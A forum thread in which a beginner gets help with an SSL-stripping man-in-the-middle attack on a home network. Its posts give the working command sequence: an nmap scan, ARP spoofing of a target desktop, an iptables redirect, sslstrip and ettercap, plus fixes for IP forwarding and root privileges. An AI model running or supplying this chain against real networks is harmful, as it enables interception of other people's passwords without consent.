DHCP: [192.168.1.1] ACK : 0.0.0.0 invalid GW invalid
first off. hello and thank you for the support already provided here in the forums. im very new to bt.
goal: trying to sniff ssl using g0tmi1lk's tutorial YouTube - Tutorial How To Sniff SSL HTTP in my home network. i have one desktop and 2 laptops connected to this network. i use my laptop for backtrack 4...using a usb persistent drive.
steps im applying:
ifconfig
nmap 192.168.1.1-254
kate /etc/etter.conf (editing as shown in vid)
arpspoof -i wlan0 -t 192.168.1.104(the desktop) 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -a -k -f
ettercap -Tq -iwlan0
problem: DHCP: [192.168.1.1] ACK : 0.0.0.0 invalid GW invalid. so basically i cant get ettercap to sniff the ssl pass on any of my machines. i also tried in vmplayer...still no luck.
obviously i see the error here. not quite sure what it means...invalid gateway? and not sure how to fix. ive tried sniffing ssl on the second laptop that uses win7. same error...and sometimes it doesnt look like ettercap is even sniffing. i know that -q makes is that way..but yeah.
any help is very much appreciated. thank you in advance!
Re: DHCP: [192.168.1.1] ACK : 0.0.0.0 invalid GW invalid
If those steps are the exact ones you follow you forgot to set ip_forward to 1.
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
Also do you use DHCP ? Does your router have protection against ARP Poisoning ? Have you tried with only ettercap ?
Re: DHCP: [192.168.1.1] ACK : 0.0.0.0 invalid GW invalid
i solved the problem by editing something else. kate /etc/etter.conf and changing the privs to = 0
[privs]
ec_uid = 0
ec_gid = 0
with those settings i can sniff everything just fine. still not sure what that changes though.
"If those steps are the exact ones you follow you forgot to set ip_forward to 1." i will try this method tomorrow. thank you!!
Re: DHCP: [192.168.1.1] ACK : 0.0.0.0 invalid GW invalid
User 0 which you set the uid and gid to is root :) so you have given it root privileges.
Quote:
"If those steps are the exact ones you follow you forgot to set ip_forward to 1." i will try this method tomorrow. thank you!!
I really suggest before you start experimenting you try and read more about what this attack actually does.
Re: DHCP: [192.168.1.1] ACK : 0.0.0.0 invalid GW invalid
im actually reading up on everything now! just trying to apply what im learning by practicing it ya know. anyways ty for your help. and if you have any reference for reading material that u particularly enjoy...plz post it :D
